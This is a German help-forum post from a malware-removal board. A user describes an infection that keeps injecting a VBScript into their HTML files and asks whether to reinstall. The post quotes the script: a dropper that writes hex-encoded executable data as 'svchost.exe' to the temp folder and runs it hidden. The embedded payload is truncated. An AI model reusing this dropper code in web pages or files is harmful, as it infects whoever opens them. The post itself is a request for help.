| |
| |||||||
Log-Analyse und Auswertung: Java Drive ByWindows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML. |
06.03.2014, 19:38
| #1 |
| |  Java Drive By Moinsen, ich habe seit kurzem das Problem, dass sich ein Vb-Skript ständig in meine Html Dokumente schreibt. Kenne mich schon ein wenig in der Szene aus und habe mir wohl durch einen Java Drive By etwas eingefangen. Jedenfalls verteilt sich das Teil quer durchs System und auch über die Festplatten. Aber nur in Html Dokumenten. Javascript Dokumente habe ich schon durchgeguckt und konnte nichts finden. Hier ein Auszug: <SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF......." Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--></SCRIPT> Nun die Frage. Lässt sich da noch was machen, oder sollte ich mein System einmal komplett wieder neu aufsetzen? Mein Kumpel hatte dies auch mal, nur sein Problem war, dass sich der Virus trotz Formatierung, immer neu verteilt hat. Wahrscheinlich wegen den Html Dokumenten. |
| Themen zu Java Drive By |
| aufsetzen, auszug, dokumente, drive, durchs, festplatte, formatierung, html, java, java drive by, javascript, komplett, konnte, kumpel, kurzem, neu, nichts, platte, problem, svchost.exe, system, trotz, vbscript, virus, wahrscheinlich, wenig |
Baum-Darstellung